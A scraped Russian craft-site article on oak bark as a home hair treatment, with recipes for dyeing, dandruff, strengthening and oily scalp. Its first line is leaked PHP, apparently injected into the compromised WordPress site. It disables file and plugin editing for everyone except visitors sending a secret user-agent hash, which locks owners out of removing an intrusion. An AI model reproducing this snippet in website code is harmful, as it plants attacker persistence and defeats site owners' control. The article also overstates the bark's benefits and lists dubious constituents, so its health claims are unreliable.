if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Кора дуба — бюджетное решение любых проблем | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Кора дуба — бюджетное решение любых проблем

Кора дуба - это натуральный препарат, который можно без проблем использовать в домашних условиях. Благодаря уникальному составу она делает волосы сильными и блестящими.

Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми с каж­дый днем ста­но­вит­ся все попу­ляр­нее. Доволь­но часто в каче­стве ингре­ди­ен­та средств для волос исполь­зу­ют кору дуба. Она помо­га­ет укре­пить воло­сы, вос­ста­но­вить их струк­ту­ру, а так­же сде­лать глад­ки­ми и бле­стя­щи­ми, как у моде­лей с обло­жек жур­на­лов. Кора дуба содер­жит мно­же­ство ком­по­нен­тов, кото­рые бла­го­твор­но вли­я­ют на кож­ный покров голо­вы и общее состо­я­ние волос.

Достоинства коры дуба

Уход за воло­са­ми для каж­дой жен­щи­ны доволь­но щекот­ли­вый вопрос. Ведь недо­стат­ки локо­нов скрыть труд­но. В такой ситу­а­ции помо­га­ет кора дуба, эффек­тив­ность при­ме­не­ния кото­рой неоспо­ри­ма. Полез­ные свой­ства опре­де­ля­ют­ся хими­че­ским соста­вом средства:

  • леву­лин. Он спо­соб­ству­ет укреп­ле­нию воло­ся­ных фол­ли­кул, сти­му­ли­ру­ет рост и пре­пят­ству­ет выпа­де­нию волос;
  • пек­ти­ны высво­бож­да­ют воло­сы от вред­ных веществ, кото­рые в них накопились;
  • крах­мал под­су­ши­ва­ет воло­сы и нор­ма­ли­зи­ру­ет рабо­ту саль­ных желез на коже головы;
  • пен­та­зо­ны вос­ста­нав­ли­ва­ют повре­жде­ния в струк­ту­ре волос. Так­же они помо­га­ют зале­чить секу­щи­е­ся кончики;
  • дубиль­ные веще­ства помо­га­ют изба­вить­ся от вос­па­ле­ний и гриб­ко­вых заболеваний;
  • фло­ба­фен – это пиг­мент. Имен­но он отве­ча­ет за окра­ши­ва­ние прядей.

Ника­кая лечеб­ная кос­ме­ти­ка не идет в срав­не­ние по полез­но­сти с корой дуба. Регу­ляр­ное при­ме­не­ние сред­ства вос­ста­но­вит и улуч­шит состо­я­ние даже самых про­блем­ных волос.

Оздоровление волос при помощи коры дуба

img_53d37cbbb7b06

Для начи­на­ю­щих осва­и­вать азы ухо­да за собой, кора дуб под­хо­дит как ника­кое дру­гое сред­ство. Одно из глав­ных пре­иму­ществ – это доволь­но низ­кая сто­и­мость. Но при покуп­ке в апте­ке сле­ду­ет обра­тить вни­ма­ние на срок год­но­сти. Как и любой дру­гой про­дукт, кора дуба не долж­на быть про­сро­чен­ной. Перед пер­вым при­ме­не­ни­ем сле­ду­ет сде­лать неболь­шой тест на аллер­ги­че­скую реак­цию. Для это­го необ­хо­ди­мо смо­чить вату в настое и немно­го поте­реть на запястье. В ред­ких слу­ча­ях воз­мож­ны покрас­не­ния и зуд.

Исполь­зуя кору дуба, про­во­дят опо­лас­ки­ва­ние волос и при­да­ние им корич­не­ва­то­го оттен­ка без при­ме­не­ния хими­че­ско­го воз­дей­ствия. Свет­ло­во­ло­сым девуш­кам сто­ит быть осто­рож­ны­ми, посколь­ку отвар из сред­ства может окра­сить воло­сы в некра­си­вый рыжий отте­нок. Кос­ме­то­ло­ги сове­ту­ют перед исполь­зо­ва­ни­ем опро­бо­вать на отдель­ной пря­ди. Так­же мож­но добав­лять настой в покуп­ные маски.

Огра­ни­че­ний по часто­те при­ме­не­ния отва­ров и масок с корой дуба нет.

Варианты применения коры дуба для волос

Все рецеп­ты с при­ме­не­ни­ем коры дуба не сосчи­тать. С их помо­щью мож­но окра­сить воло­сы, вос­ста­но­вить их либо про­сто исполь­зо­вать для про­фи­лак­ти­ки. При­го­тов­ле­ние не отни­мет мно­го вре­ме­ни. В зави­си­мо­сти от постав­лен­ных целей, рецепт будет варьироваться.

kora-duba

Окрашивание

Окра­ши­ва­ние корой дуба подой­дет дале­ко не всем, посколь­ку оно при­даст воло­сам каш­та­но­вый отте­нок с ярким крас­но­ва­тым отли­вом. Смот­реть­ся цвет будет вполне нату­раль­но. К тому же, про­це­ду­ра укре­пит кор­ни волос и выле­чит кож­ный покров голо­вы от забо­ле­ва­ний. Уход за воло­са­ми гаран­ти­ро­ван. Необ­хо­ди­мо сме­шать 2 сто­ло­вые лож­ки коры дуба и сто­ло­вую лож­ку шелу­хи лука. Залить смесь кипят­ком (2 ста­ка­на) и поста­вить на сред­ний огонь. Кипя­тить в тече­ние 30 минут, ино­гда поме­ши­вая. Отва­ром несколь­ко раз про­мыть воло­сы. Про­це­жи­вать не нуж­но. Слег­ка отжать воло­сы и надеть цел­ло­фа­но­вую шапоч­ку либо пакет. Подер­жать 1 час, после чего смыть, исполь­зуя шампунь.

Средство от перхоти

Взять по 2 сто­ло­вых лож­ки коры дуба и листьев кра­пи­вы, и по 1 сто­ло­вой лож­ке полы­ни и листьев подо­рож­ни­ка. Смесь хоро­шо пере­ме­шать и поста­вить на водя­ную баню на 10–15 минут. Затем про­це­дить, пред­ва­ри­тель­но осту­див. Исполь­зо­вать после мытья голо­вы в каче­стве ополаскивателя.

Укрепление волос

Све­жие листья мяты и оду­ван­чи­ка мел­ко измель­чить. Сме­шать чай­ную лож­ку полу­чен­ной сме­си и чай­ную лож­ку коры дуба (про­пор­ция 1:1). Затем залить кипят­ком – 2 ста­ка­на. Накрыть крыш­кой и оста­вить наста­и­вать­ся 20–30 минут. В ито­ге долж­на полу­чить­ся свое­об­раз­ная каши­ца. Ее необ­хо­ди­мо акку­рат­но вти­рать в кор­ни волос, после чего надеть цел­ло­фа­но­вую шапоч­ку и уку­тать поло­тен­цем. Дер­жать мас­ку сле­ду­ет всю ночь. Такая мас­ка отно­сит­ся к кате­го­рии лечеб­ной косметики.

Избавление от излишней жирности кожи головы

Кору дуба часто при­ме­ня­ют для жир­ных волос. В рав­ных про­пор­ци­ях сме­шать кору дуба и листья зве­робоя, после залить кру­тым кипят­ком и про­ва­рить на мед­лен­ном огне 10–15 минут. Слег­ка осту­дить и про­це­дить. Полу­чен­ный отвар раз­ве­сти водой, что­бы в ито­ге полу­чи­лось 200 мл сред­ства. Исполь­зо­вать после мытья волос в каче­стве ополаскивателя.

Уход за воло­са­ми – слож­ный про­цесс тре­бу­ю­щий про­ве­де­ния про­це­дур на регу­ляр­ной осно­ве. Глав­ное подо­брать эффек­тив­ные сред­ства в зави­си­мо­сти от инди­ви­ду­аль­ных пред­по­чте­ний и про­блем. Воло­сы отбла­го­да­рят здо­ро­вым блес­ком и шелковистостью.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!